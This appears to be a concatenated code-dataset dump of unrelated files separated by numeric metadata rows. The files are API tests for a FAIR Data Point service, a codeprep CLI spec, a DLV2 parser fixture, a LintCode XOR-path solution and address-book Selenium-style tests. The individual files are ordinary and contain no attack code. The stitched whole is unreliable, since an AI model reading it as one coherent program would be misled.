        assert rv.json['message'] == 'Ok'
        # Listing endpoint returns plain text with one entry per catalog.
        rv = client.get('/catalog')
        assert rv.status_code == 200
        assert 'GET' in rv.headers['Allow']
        assert rv.mimetype == 'text/plain'
        assert b'catalog01' in rv.data
        assert b'catalog02' in rv.data
        rv = client.get('/catalog/catalog01')
        assert rv.status_code == 200
        assert 'Allow' in rv.headers
        assert 'GET' in rv.headers['Allow']
        assert rv.mimetype == 'text/turtle'
        assert b'catalog01' in rv.data
        assert b'hasVersion "1.0"' in rv.data
        rv = client.put('/catalog/catalog01', data=datadir['catalog01_update.ttl'])
        # NOTE(review): the status-code assertion below was disabled and a debug
        # print left in -- presumably while chasing a PUT failure; worth revisiting.
        # assert rv.status_code == 200
        # assert rv.json['message'] == 'Ok'
        print(rv.data)
        assert rv.json['message'] == 'Ok'
        rv = client.get('/catalog/catalog01')
        assert rv.status_code == 200
        assert b'catalog01' in rv.data
        assert b'hasVersion "2.0"' in rv.data
        # After DELETE, every verb on the deleted resource yields 404 Not Found.
        rv = client.delete('/catalog/catalog01')
        assert rv.status_code == 204
        rv = client.get('/catalog/catalog01')
        assert rv.status_code == 404
        assert 'message' in rv.json
        assert rv.json['message'] == 'Not Found'
        rv = client.put('/catalog/catalog01', data=datadir['catalog01_update.ttl'])
        assert rv.status_code == 404
        assert 'message' in rv.json
        assert rv.json['message'] == 'Not Found'
        rv = client.delete('/catalog/catalog01')
        assert rv.status_code == 404
        assert 'message' in rv.json
        assert rv.json['message'] == 'Not Found'
        rv = client.get('/catalog')
        assert rv.status_code == 200
        assert b'catalog01' not in rv.data
        assert b'catalog02' in rv.data
        rv = client.delete('/catalog/catalog02')
        assert rv.status_code == 204
        # Empty listing responds 204 No Content.
        rv = client.get('/catalog')
        assert rv.status_code == 204

    def test_catalog_invalid(self, client, datadir):
        """Test invalid metadata to catalog layer"""
        rv = client.post('/catalog', data=datadir['catalog01_invalid_missingRequired.ttl'])
        assert rv.status_code == 405
        assert 'Validation Report\nConforms: False\nResults (9)' in rv.json['message']

    def test_dataset(self, client, datadir):
        """Testing post, get, put and delete to dataset"""
        rv = client.post('/dataset', data=datadir['dataset01.ttl'])
        assert rv.status_code == 200
        assert rv.json['message'] == 'Ok'
        rv = client.post('/dataset', data=datadir['dataset02.ttl'])
        assert rv.status_code == 200
        assert rv.json['message'] == 'Ok'
        rv = client.get('/dataset')
        assert rv.status_code == 200
        assert 'GET' in rv.headers['Allow']
        assert rv.mimetype == 'text/plain'
        # dataset01.ttl declares the resource id 'breedb'.
        assert b'breedb' in rv.data
        assert b'dataset02' in rv.data
        rv = client.get('/dataset/breedb', )
        assert rv.status_code == 200
        assert 'GET' in rv.headers['Allow']
        assert rv.mimetype == 'text/turtle'
        assert b'breedb' in rv.data
        assert b'hasVersion "1.0"' in rv.data
        rv = client.put('/dataset/breedb', data=datadir['dataset01_update.ttl'])
        assert rv.status_code == 200
        assert rv.json['message'] == 'Ok'
        rv = client.get('/dataset/breedb', )
        assert rv.status_code == 200
        assert b'breedb' in rv.data
        assert b'hasVersion "2.0"' in rv.data
        rv = client.delete('/dataset/breedb')
        assert rv.status_code == 204
        rv = client.get('/dataset/breedb')
        assert rv.status_code == 404
        assert 'message' in rv.json
        assert rv.json['message'] == 'Not Found'
        rv = client.put('/dataset/breedb', data=datadir['dataset01_update.ttl'])
        assert rv.status_code == 404
        assert 'message' in rv.json
        assert rv.json['message'] == 'Not Found'
        rv = client.delete('/dataset/breedb')
        assert rv.status_code == 404
        assert 'message' in rv.json
        assert rv.json['message'] == 'Not Found'
        rv = client.get('/dataset')
        assert rv.status_code == 200
        assert b'breedb' not in rv.data
        assert b'dataset02' in rv.data
        rv = client.delete('/dataset/dataset02')
        assert rv.status_code == 204
        rv = client.get('/dataset')
        assert rv.status_code == 204

    def test_dataset_invalid(self, client, datadir):
        """Test invalid metadata to dataset layer"""
        rv = client.post('/dataset', data=datadir['dataset01_invalid_missingRequired.ttl'])
        assert rv.status_code == 405
        assert 'Validation Report\nConforms: False\nResults (9)' in rv.json['message']

    def test_distribution(self, client, datadir):
        """Testing post, get, put and delete to distribution"""
        rv = client.post('/distribution', data=datadir['dist01.ttl'])
        assert rv.status_code == 200
        assert rv.json['message'] == 'Ok'
        rv = client.post('/distribution', data=datadir['dist02.ttl'])
        assert rv.status_code == 200
        assert rv.json['message'] == 'Ok'
        rv = client.get('/distribution')
        assert rv.status_code == 200
        assert 'GET' in rv.headers['Allow']
        assert rv.mimetype == 'text/plain'
        assert b'breedb-sparql' in rv.data
        assert b'dist02' in rv.data
        rv = client.get('/distribution/breedb-sparql')
        assert rv.status_code == 200
        assert 'GET' in rv.headers['Allow']
        assert rv.mimetype == 'text/turtle'
        assert b'breedb-sparql' in rv.data
        assert b'hasVersion "1.0"' in rv.data
        rv = client.put('/distribution/breedb-sparql', data=datadir['dist01_update.ttl'])
        assert rv.status_code == 200
        assert rv.json['message'] == 'Ok'
        rv = client.get('/distribution/breedb-sparql')
        assert rv.status_code == 200
        assert b'breedb-sparql' in rv.data
        assert b'hasVersion "2.0"' in rv.data
        rv = client.delete('/distribution/breedb-sparql')
        assert rv.status_code == 204
        rv = client.get('/distribution/breedb-sparql')
        assert rv.status_code == 404
        assert 'message' in rv.json
        assert rv.json['message'] == 'Not Found'
        rv = client.put('/distribution/breedb-sparql', data=datadir['dist01_update.ttl'])
        assert rv.status_code == 404
        assert 'message' in rv.json
        assert rv.json['message'] == 'Not Found'
        rv = client.get('/distribution')
        assert rv.status_code == 200
        assert b'breedb-sparql' not in rv.data
        assert b'dist02' in rv.data
        rv = client.delete('/distribution/dist02')
        assert rv.status_code == 204
        rv = client.get('/distribution')
        assert rv.status_code == 204

    def test_distribution_invalid(self, client, datadir):
        """Test invalid metadata to distribution layer"""
        rv = client.post('/distribution', data=datadir['dist01_invalid_missingRequired.ttl'])
        assert rv.status_code == 405
        assert 'message' in rv.json
        assert 'Validation Report\nConforms: False\nResults (9)' in rv.json['message']
        rv = client.post('/distribution', data=datadir['dist01_invalid_2URLs.ttl'])
        assert rv.status_code == 405
        assert 'message' in rv.json
        assert 'Validation Report\nConforms: False\nResults (1)' in rv.json['message']
class TestMIMETypes:
    """Test different MIME types for GET and POST methods.

    BUG FIX: three checks in this class were bare expressions with no
    ``assert`` keyword (the ``in rv.data`` membership tests in the n3 and
    n-triples tests, and the dict comparison in the JSON-LD test), so they
    evaluated to a discarded boolean and never verified anything.  They are
    now real assertions.  An unused file read (feeding only a commented-out
    full-text comparison) was removed as dead code.
    """

    def test_fdp_n3(self, client_new_store, datadir):
        """POST the FDP metadata as text/n3 and read it back in the same format."""
        rv = client_new_store.post('/fdp', data=datadir['fdp.n3'], content_type='text/n3')
        assert rv.status_code == 200
        assert 'message' in rv.json
        assert rv.json['message'] == 'Ok'
        rv = client_new_store.get('/fdp', headers={'accept': 'text/n3'})
        assert rv.status_code == 200
        assert rv.mimetype == 'text/n3'
        # Full-text comparison is unreliable (triple serialization order is
        # random), so pin a single representative triple instead.
        assert b'<http://0.0.0.0/fdp> <http://rdf.biosemantics.org/ontologies/fdp-o#metadataIssued> "2019-04-09T10:01:00"^^<http://www.w3.org/2001/XMLSchema#dateTime> .' in rv.data

    def test_fdp_xml(self, client_new_store, datadir):
        """POST the FDP metadata as RDF/XML and read it back in the same format."""
        rv = client_new_store.post('/fdp', data=datadir['fdp.rdf'], content_type='application/rdf+xml')
        assert rv.status_code == 200
        assert 'message' in rv.json
        assert rv.json['message'] == 'Ok'
        rv = client_new_store.get('/fdp', headers={'accept': 'application/rdf+xml'})
        assert rv.status_code == 200
        assert rv.mimetype == 'application/rdf+xml'
        assert b'<fdp:metadataIssued rdf:datatype="http://www.w3.org/2001/XMLSchema#dateTime">2019-04-09T10:01:00</fdp:metadataIssued>' in rv.data

    def test_fdp_jsonld(self, client_new_store, datadir):
        """POST the FDP metadata as JSON-LD and read it back in the same format."""
        rv = client_new_store.post('/fdp', data=datadir['fdp.jsonld'], content_type='application/ld+json')
        assert rv.status_code == 200
        assert 'message' in rv.json
        assert rv.json['message'] == 'Ok'
        rv = client_new_store.get('/fdp', headers={'accept': 'application/ld+json'})
        assert rv.status_code == 200
        assert rv.mimetype == 'application/ld+json'
        expected = {'@type': 'http://www.w3.org/2001/XMLSchema#dateTime', '@value': '2019-04-09T10:01:00'}
        issued = rv.json[0]['http://rdf.biosemantics.org/ontologies/fdp-o#metadataIssued']
        # NOTE(review): JSON-LD serializers commonly wrap property values in a
        # list; accept either the bare object or the single-element list form.
        assert issued == expected or issued == [expected]

    def test_fdp_nt(self, client_new_store, datadir):
        """POST the FDP metadata as N-Triples and read it back in the same format."""
        rv = client_new_store.post('/fdp', data=datadir['fdp.nt'], content_type='application/n-triples')
        assert rv.status_code == 200
        assert 'message' in rv.json
        assert rv.json['message'] == 'Ok'
        rv = client_new_store.get('/fdp', headers={'accept': 'application/n-triples'})
        assert rv.status_code == 200
        assert rv.mimetype == 'application/n-triples'
        assert b'<http://0.0.0.0/fdp> <http://rdf.biosemantics.org/ontologies/fdp-o#metadataIssued> "2019-04-09T10:01:00"^^<http://www.w3.org/2001/XMLSchema#dateTime> .' in rv.data
| 40.045584
| 173
| 0.618384
| 1,871
| 14,056
| 4.566542
| 0.092464
| 0.090824
| 0.101592
| 0.130618
| 0.862594
| 0.850655
| 0.828301
| 0.782537
| 0.725187
| 0.660112
| 0
| 0.038187
| 0.241747
| 14,056
| 351
| 174
| 40.045584
| 0.763464
| 0.051935
| 0
| 0.711027
| 0
| 0.011407
| 0.27122
| 0.044173
| 0
| 0
| 0
| 0
| 0.631179
| 1
| 0.053232
| false
| 0
| 0.007605
| 0
| 0.068441
| 0.003802
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
a868f485ffa7e63ccc61184eddf987c19e6a8685
| 11,464
|
py
|
Python
|
codeprep/cli/spec.py
|
maximzubkov/codeprep
|
807ee1ea33796b6853c45e9dcb4e866b3f09a5f2
|
[
"Apache-2.0"
] | 33
|
2020-03-02T23:42:15.000Z
|
2022-03-18T02:34:32.000Z
|
codeprep/cli/spec.py
|
maximzubkov/codeprep
|
807ee1ea33796b6853c45e9dcb4e866b3f09a5f2
|
[
"Apache-2.0"
] | 10
|
2020-02-27T13:43:00.000Z
|
2021-04-21T12:11:44.000Z
|
codeprep/cli/spec.py
|
maximzubkov/codeprep
|
807ee1ea33796b6853c45e9dcb4e866b3f09a5f2
|
[
"Apache-2.0"
] | 9
|
2020-03-16T14:28:06.000Z
|
2021-09-30T09:40:56.000Z
|
# SPDX-FileCopyrightText: 2020 Hlib Babii <hlibbabii@gmail.com>
#
# SPDX-License-Identifier: Apache-2.0
import logging
import docopt_subcommands as dsc
from codeprep.cli.impl import handle_splitting, handle_learnbpe
from codeprep.config import app_name, version
logger = logging.getLogger(__name__)
@dsc.command()
# NOTE: the docstring below is parsed by docopt-subcommands as the CLI grammar
# for this command -- its exact wording defines the accepted options, so it
# must not be reworded or reformatted casually.
def nosplit_handler(args):
    """usage: {program} nosplit (-p <path> [-o <path-out>] | <text>) [-e <ext>]
    [--no-spaces] [--no-unicode] [--no-com] ( [--no-str] | [-L=<max-str-length>] [--full-strings] )
    [--calc-vocab] [--verbose]

    Preprocesses the dataset without splitting compound identifier.

    Options:
      -p, --path <path>                            Path to the dataset to be preprocessed.
      -o <path-out>, --output-path <path-out>      Directory to which the pre-preprocessed corpus is to be written. If not specified, equals to '<path>_preprocessed'.
      <text>                                       Text to be preprocessed.
      -e --ext <ext>                               In case of using --path argument:
                                                   Limits the set of input files to the files with the specified extension(s).
                                                   The format is the following: "py|java|...|js" If not specififed, all the files are read.
                                                   In case of passing text:
                                                   extension which a file containing source code written in this programming language would have,
                                                   e.g. 'java', 'py', 'js'.

      --no-spaces, -0                              Preserve newlines and tabs.
      --no-unicode, -U                             Replace words containing non-ascii characters with <non-en> placeholders.
      --no-com, -C                                 Replace comments with <comment> placeholders.
      --no-str, -S                                 Replace strings with <string> placeholders.
      --full-strings, -f                           Leave string literals as they are (without even splitting on whitespace characters)
      -L, --max-str-length=<max-str-length>        Replace string literal with `""` if its length including quotes exceeds `max_str_length`;
                                                   equals to `sys.maxsize` if not specified.

      --calc-vocab -V                              Calculate vocabulary of the preprocessed dataset afterwards

      --verbose, -v                                Print logs with log level DEBUG and higher to stdout.
    """
    handle_splitting(args)
@dsc.command()
# NOTE: the docstring below is parsed by docopt-subcommands as the CLI grammar
# for this command; keep its wording intact.
def chars_handler(args):
    """usage: {program} chars (-p <path> [-o <path-out>] | <text>) [-e <ext>]
    [--no-spaces] [--no-unicode] [--no-com] [--no-str | -L=<max-str-length>]
    [--calc-vocab] [--verbose]

    Preprocesses the dataset by splitting identifiers into characters.

    Options:
      -p, --path <path>                            Path to the dataset to be preprocessed.
      -o <path-out>, --output-path <path-out>      Directory to which the pre-preprocessed corpus is to be written. If not specified, equals to '<path>_preprocessed'.
      <text>                                       Text to be preprocessed.
      -e --ext <ext>                               In case of using --path argument:
                                                   Limits the set of input files to the files with the specified extension(s).
                                                   The format is the following: "py|java|...|js" If not specififed, all the files are read.
                                                   In case of passing text:
                                                   extension which a file containing source code written in this programming language would have,
                                                   e.g. 'java', 'py', 'js'.

      --no-spaces, -0                              Preserve newlines and tabs.
      --no-unicode, -U                             Replace words containing non-ascii characters with <non-en> placeholders.
      --no-com, -C                                 Replace comments with <comment> placeholders.
      --no-str, -S                                 Replace strings with <string> placeholders.
      -L, --max-str-length=<max-str-length>        Replace string literal with `""` if its length including quotes exceeds `max_str_length`;
                                                   equals to `sys.maxsize` if not specified.

      --calc-vocab -V                              Calculate vocabulary of the preprocessed dataset afterwards

      --verbose, -v                                Print logs with log level DEBUG and higher to stdout.
    """
    handle_splitting(args)
@dsc.command()
# NOTE: the docstring below is parsed by docopt-subcommands as the CLI grammar
# for this command; keep its wording intact.
def basic_handler(args):
    """usage: {program} basic (-p <path> [-o <path-out>] | <text>) [-e <ext>] [-n [-r [-s]]]
    [--no-spaces] [--no-unicode] [--no-case] [--no-com] [--no-str | -L=<max-str-length>]
    [--calc-vocab] [--verbose]

    Preprocesses the dataset by splitting compound identifiers according to CamelCase and snake_case conventions.

    Options:
      -p, --path <path>                            Path to the dataset to be preprocessed.
      -o <path-out>, --output-path <path-out>      Directory to which the pre-preprocessed corpus is to be written. If not specified, equals to '<path>_preprocessed'.
      <text>                                       Text to be preprocessed.
      -e --ext <ext>                               In case of using --path argument:
                                                   Limits the set of input files to the files with the specified extension(s).
                                                   The format is the following: "py|java|...|js" If not specififed, all the files are read.
                                                   In case of passing text:
                                                   extension which a file containing source code written in this programming language would have,
                                                   e.g. 'java', 'py', 'js'.

      --split-numbers, -n                          Split numbers into digits
      --ronin, -r                                  Preprocesses the dataset splitting identifiers with Ronin algorithm: http://joss.theoj.org/papers/10.21105/joss.00653.
      --stem, -s                                   Do stemming with Porter stemmer

      --no-spaces, -0                              Preserve newlines and tabs.
      --no-unicode, -U                             Replace words containing non-ascii characters with <non-en> placeholders.
      --no-case, -l                                Lowercase words and encode information about case in <Cap> <CAP> tokens.
      --no-com, -C                                 Replace comments with <comment> placeholders.
      --no-str, -S                                 Replace strings with <string> placeholders.
      -L, --max-str-length=<max-str-length>        Replace string literal with `""` if its length including quotes exceeds `max_str_length`;
                                                   equals to `sys.maxsize` if not specified.

      --calc-vocab -V                              Calculate vocabulary of the preprocessed dataset afterwards

      --verbose, -v                                Print logs with log level DEBUG and higher to stdout.
    """
    handle_splitting(args)
@dsc.command()
# NOTE: the docstring below is parsed by docopt-subcommands as the CLI grammar
# for this command; keep its wording intact.
def bpe_handler(args):
    """usage: {program} bpe (1k | 5k | 10k | <bpe-codes-id>) (-p <path> [-o <path-out>] | <text>) [-e <ext>]
    [--no-str | -L=<max-str-length>] [--no-com] [--no-spaces] [--no-unicode] [--calc-vocab] [--verbose]

    Preprocesses the dataset by splitting compound identifiers according to CamelCase and snake_case conventions,
    and applies byte-pair encoding (BPE) on top.

    Options:
      -p, --path <path>                            Path to the dataset to be preprocessed.
      -o <path-out>, --output-path <path-out>      Directory to which the pre-preprocessed corpus is to be written. If not specified, equals to '<path>_preprocessed'.
      <text>                                       Text to be preprocessed.
      -e --ext <ext>                               In case of using --path argument:
                                                   Limits the set of input files to the files with the specified extension(s).
                                                   The format is the following: "py|java|...|js" If not specififed, all the files are read.
                                                   In case of passing text:
                                                   extension which a file containing source code written in this programming language would have,
                                                   e.g. 'java', 'py', 'js'.

      --no-str, -S                                 Replace strings with <string> placeholders.
      --no-com, -C                                 Replace comments with <comment> placeholders.
      --no-spaces, -0                              Preserve newlines and tabs.
      --no-unicode, -U                             Replace words containing non-ascii characters with <non-en> placeholders.
      -L, --max-str-length=<max-str-length>        Replace string literal with `""` if its length including quotes exceeds `max_str_length`;
                                                   equals to `sys.maxsize` if not specified.

      --calc-vocab -V                              Calculate vocabulary of the preprocessed dataset afterwards

      --verbose, -v                                Print logs with log level DEBUG and higher to stdout.
    """
    handle_splitting(args)
# NOTE(review): as with the other subcommands, the docstring is the
# docopt-style CLI spec consumed by `dsc` at runtime -- left untouched.
@dsc.command()
def bpelearn_handler(args):
    """usage: {program} learn-bpe <n-merges> -p <path> [-e <ext>] [--id <bpe-codes-id>] [--no-unicode | --bytes] [--word-end] [--legacy] [--verbose]
    Trains bpe codes on a specified corpus.
    Options:
    <n-merges>                                       The number of BPE merges to compute
    -p, --path <path>                                Path to the dataset to be used to learn bpe codes.
    -e --ext <ext>                                   Limits the set of input files to the files with the specified extension(s).
                                                     The format is the following: "ext1|ext2|...|extN" If not specififed, all the files are read.
    --id <bpe-codes-id>                              Give an id to bpe-codes. If not specified, will be assigned automatically based on the name of the directory bpe codes were learned from
    --no-unicode, -U                                 Ignore words containing non-ascii characters.
    --bytes, -b                                      Treat non-ascii characters as 2 bytes and do real byte-pair encoding.
    --word-end, -z                                   Add a special character to the end of each word.
    --legacy                                         Parse using legacy parser (only files with extension “.java” will be processed)
    --verbose, -v                                    Print logs with log level DEBUG and higher to stdout.
    """
    # Delegates to the BPE-learning pipeline defined elsewhere in this file.
    handle_learnbpe(args)
def parse_and_run(args):
    """Parse `args` and dispatch to the matching `@dsc.command()` handler.

    `app_name` and `version` are module-level values defined elsewhere in
    this file; `exit_at_end=False` keeps `dsc` from calling sys.exit so the
    caller regains control after the command runs.
    """
    dsc.main(app_name, f'{app_name} {version}', argv=args, exit_at_end=False)
| 64.768362
| 187
| 0.516661
| 1,267
| 11,464
| 4.64483
| 0.188635
| 0.016313
| 0.032625
| 0.017672
| 0.752082
| 0.743246
| 0.73407
| 0.73407
| 0.720136
| 0.7113
| 0
| 0.004155
| 0.391137
| 11,464
| 177
| 188
| 64.768362
| 0.838968
| 0.900994
| 0
| 0.409091
| 0
| 0
| 0.029455
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.272727
| false
| 0
| 0.181818
| 0
| 0.454545
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a883ff1a0bd8a339fd95681c4bad6ec866cfe6ab
| 197
|
py
|
Python
|
tests/parser/detcons.8.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
tests/parser/detcons.8.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
tests/parser/detcons.8.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
# DLV2 parser regression fixture: `input` holds the ASP program fed to the
# parser and `output` the expected result -- here the program is expected
# back unchanged.  NOTE(review): presumably the harness compares these
# verbatim; confirm against the test runner.  `input` shadows the builtin,
# but the variable names look like part of the harness contract, so they
# are kept as-is.
input = """
x | y.
:- x.
a :- x.
a :- not y.
a :- b.
b :- a.
t :- not a, not b, not x.
"""
output = """
x | y.
:- x.
a :- x.
a :- not y.
a :- b.
b :- a.
t :- not a, not b, not x.
"""
| 10.368421
| 26
| 0.329949
| 40
| 197
| 1.625
| 0.2
| 0.123077
| 0.092308
| 0.123077
| 0.830769
| 0.830769
| 0.830769
| 0.830769
| 0.830769
| 0.830769
| 0
| 0
| 0.375635
| 197
| 18
| 27
| 10.944444
| 0.528455
| 0
| 0
| 0.888889
| 0
| 0
| 0.830601
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
a8980c03dc8f666410fca2c8e1ef1a095144b3ae
| 2,855
|
py
|
Python
|
lintcode/1516.py
|
jianershi/algorithm
|
c3c38723b9c5f1cc745550d89e228f92fd4abfb2
|
[
"MIT"
] | 1
|
2021-01-08T06:57:49.000Z
|
2021-01-08T06:57:49.000Z
|
lintcode/1516.py
|
jianershi/algorithm
|
c3c38723b9c5f1cc745550d89e228f92fd4abfb2
|
[
"MIT"
] | null | null | null |
lintcode/1516.py
|
jianershi/algorithm
|
c3c38723b9c5f1cc745550d89e228f92fd4abfb2
|
[
"MIT"
] | 1
|
2021-01-08T06:57:52.000Z
|
2021-01-08T06:57:52.000Z
|
"""
1516. Xor Sum
https://www.lintcode.com/problem/xor-sum/description
"""
from collections import deque
class Solution:
    """
    @param arr: the arr
    @param target: the target
    @return: the sum of paths
    """
    # Meet-in-the-middle BFS: one frontier expands from the top-left corner
    # (moving right/down), the other from the bottom-right corner (moving
    # left/up).  Both halt on the diagonal x + y == (n + m) // 2, where their
    # partial XOR sums are matched through a shared dict keyed by
    # (x, y, partial_xor, which_half).

    def xorSum(self, arr, target):
        """Count monotone paths from (0, 0) to (n-1, m-1) whose XOR == target."""
        if not arr or not arr[0]:
            return 0
        n = len(arr)
        m = len(arr[0])
        # Bug fix: a 1x1 grid can never reach the meeting diagonal
        # ((n + m) // 2 == 1, but the only cell has x + y == 0), so the
        # original algorithm always returned 0 for it.  Handle it directly:
        # the single cell is the whole path.
        if n == 1 and m == 1:
            return 1 if arr[0][0] == target else 0
        hit_to_x_y_with_now_sum = {}  # (x, y, partial_xor, flag) -> count
        queue1 = deque([(0, 0, arr[0][0])])
        queue2 = deque([(n - 1, m - 1, arr[n - 1][m - 1])])
        QUEUE1_DIRECTION = [(0, 1), (1, 0)]
        QUEUE2_DIRECTION = [(0, -1), (-1, 0)]
        hit = 0
        # The forward half only records its partial sums (flag=0); its return
        # value is always 0 because no flag=1 entries exist yet.
        self.process_queue(queue1, arr, QUEUE1_DIRECTION, hit_to_x_y_with_now_sum, target, 0)
        hit += self.process_queue(queue2, arr, QUEUE2_DIRECTION, hit_to_x_y_with_now_sum, target, 1)
        return hit

    def process_queue(self, queue, arr, queue_direction, hit_to_x_y_with_now_sum, target, flag):
        """BFS one half to the meeting diagonal; return matched path pairs."""
        hit = 0
        n = len(arr)
        m = len(arr[0])
        while queue:
            x, y, now_sum = queue.popleft()
            if x + y == (n + m) // 2:
                # On the meeting diagonal: record this half's partial XOR and
                # count complementary entries from the other half.  The cell
                # arr[x][y] is XORed into both halves' sums, so it is XORed
                # once more here to cancel the duplicate contribution.
                hit_to_x_y_with_now_sum[(x, y, now_sum, flag)] = hit_to_x_y_with_now_sum.get((x, y, now_sum, flag), 0) + 1
                hit += hit_to_x_y_with_now_sum.get((x, y, target ^ now_sum ^ arr[x][y], not flag), 0)
                continue
            for delta in queue_direction:
                nx = x + delta[0]
                ny = y + delta[1]
                if not self.is_valid(arr, nx, ny):
                    continue
                next_now_sum = now_sum ^ arr[nx][ny]
                queue.append((nx, ny, next_now_sum))
        return hit

    def is_valid(self, arr, x, y):
        """True iff (x, y) lies inside the grid."""
        n = len(arr)
        m = len(arr[0])
        return 0 <= x < n and 0 <= y < m
# Ad-hoc smoke test: a 20x20 all-zero grid with target 0, so every monotone
# path matches and the printed count is the total number of paths.
solver = Solution()
grid = [[0] * 20 for _ in range(20)]
target = 0
print(solver.xorSum(grid, target))
| 42.61194
| 847
| 0.511033
| 721
| 2,855
| 1.920943
| 0.09154
| 0.581949
| 0.862094
| 1.14657
| 0.53574
| 0.492419
| 0.492419
| 0.481588
| 0.433213
| 0.320578
| 0
| 0.208983
| 0.235727
| 2,855
| 66
| 848
| 43.257576
| 0.425756
| 0.099124
| 0
| 0.285714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.015152
| 0
| 1
| 0.071429
| false
| 0
| 0.02381
| 0
| 0.214286
| 0.02381
| 0
| 0
| 1
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a8d76810d654599d3101f15d10d7d5fab3e41183
| 3,465
|
py
|
Python
|
tests/test_edit_contact.py
|
tatyankaZSGX/addressbook
|
7a22108f570fe6933c65c8e5e6f0159d114b232c
|
[
"Apache-2.0"
] | null | null | null |
tests/test_edit_contact.py
|
tatyankaZSGX/addressbook
|
7a22108f570fe6933c65c8e5e6f0159d114b232c
|
[
"Apache-2.0"
] | null | null | null |
tests/test_edit_contact.py
|
tatyankaZSGX/addressbook
|
7a22108f570fe6933c65c8e5e6f0159d114b232c
|
[
"Apache-2.0"
] | null | null | null |
__author__ = 'ZSGX'
from model.contact import Contact
import random
#def test_edit_first_contact_from_homepage(app):
# if app.contact.count() == 0:
# app.contact.create(Contact(firstname="test"))
# contact = Contact(firstname="first", middlename="Jasd", lastname="homepage", nickname="Madsti",
# title="adasor", company="Hoasdadood", address="Ladngeles")
# old_contacts = app.contact.get_contact_list()
# contact.id = old_contacts[0].id
# app.contact.go_to_editpage_from_homepage(0)
# app.contact.edit_contact(contact)
# assert len(old_contacts) == app.contact.count()
# new_contacts = app.contact.get_contact_list()
# old_contacts[0] = contact
# assert sorted(old_contacts, key=Contact.id_or_max) == sorted(new_contacts, key=Contact.id_or_max)
#def test_edit_first_contact_from_details(app):
# if app.contact.count() == 0:
# app.contact.create(Contact(firstname="test"))
# contact = Contact(firstname="first", middlename="Jasd", lastname="editing", nickname="Madsti",
# title="adasor", company="Hoasdadood", address="Ladngeles")
# old_contacts = app.contact.get_contact_list()
# contact.id = old_contacts[0].id
# app.contact.go_to_editpage_from_details(0)
# app.contact.edit_contact(contact)
# assert len(old_contacts) == app.contact.count()
# new_contacts = app.contact.get_contact_list()
# old_contacts[0] = contact
# assert sorted(old_contacts, key=Contact.id_or_max) == sorted(new_contacts, key=Contact.id_or_max)
def test_edit_rand_contact_from_homepage(app, db, check_ui, data_contact):
    """Edit a random contact through the homepage edit link and verify the DB
    (and, when enabled, the UI) shows exactly that one modification."""
    edited = data_contact
    # Guarantee there is at least one contact to pick from.
    if not db.get_contact_list():
        app.contact.create(Contact(firstname="test"))
    before = db.get_contact_list()
    victim = random.choice(before)
    edited.id = victim.id
    app.contact.go_to_editpage_by_id_from_homepage(edited.id)
    app.contact.edit_contact(edited)
    after = db.get_contact_list()
    # Expected state: the victim with every non-None field overwritten by the
    # edit data, everything else untouched.
    before.remove(victim)
    for name, value in edited.__dict__.items():
        if value is not None:
            victim.__dict__[name] = value
    before.append(victim)
    assert sorted(before, key=Contact.id_or_max) == sorted(after, key=Contact.id_or_max)
    if check_ui:
        db_view = sorted(map(app.contact.clean, db.get_contact_list()), key=Contact.id_or_max)
        ui_view = sorted(app.contact.get_contact_list(), key=Contact.id_or_max)
        assert db_view == ui_view
def test_edit_rand_contact_from_details(app, db, check_ui, json_contact):
    """Edit a random contact through its details page and verify the DB
    (and, when enabled, the UI) shows exactly that one modification."""
    edited = json_contact
    # Guarantee there is at least one contact to pick from.
    if not db.get_contact_list():
        app.contact.create(Contact(firstname="test"))
    before = db.get_contact_list()
    victim = random.choice(before)
    edited.id = victim.id
    app.contact.go_to_editpage_by_id_from_details(edited.id)
    app.contact.edit_contact(edited)
    after = db.get_contact_list()
    # Expected state: the victim with every non-None field overwritten by the
    # edit data, everything else untouched.
    before.remove(victim)
    for name, value in edited.__dict__.items():
        if value is not None:
            victim.__dict__[name] = value
    before.append(victim)
    assert sorted(before, key=Contact.id_or_max) == sorted(after, key=Contact.id_or_max)
    if check_ui:
        db_view = sorted(map(app.contact.clean, db.get_contact_list()), key=Contact.id_or_max)
        ui_view = sorted(app.contact.get_contact_list(), key=Contact.id_or_max)
        assert db_view == ui_view
| 46.824324
| 102
| 0.711111
| 477
| 3,465
| 4.813417
| 0.138365
| 0.10453
| 0.085366
| 0.073171
| 0.915505
| 0.915505
| 0.896777
| 0.896777
| 0.896777
| 0.896777
| 0
| 0.003455
| 0.164791
| 3,465
| 73
| 103
| 47.465753
| 0.78991
| 0.413276
| 0
| 0.780488
| 0
| 0
| 0.005979
| 0
| 0
| 0
| 0
| 0
| 0.097561
| 1
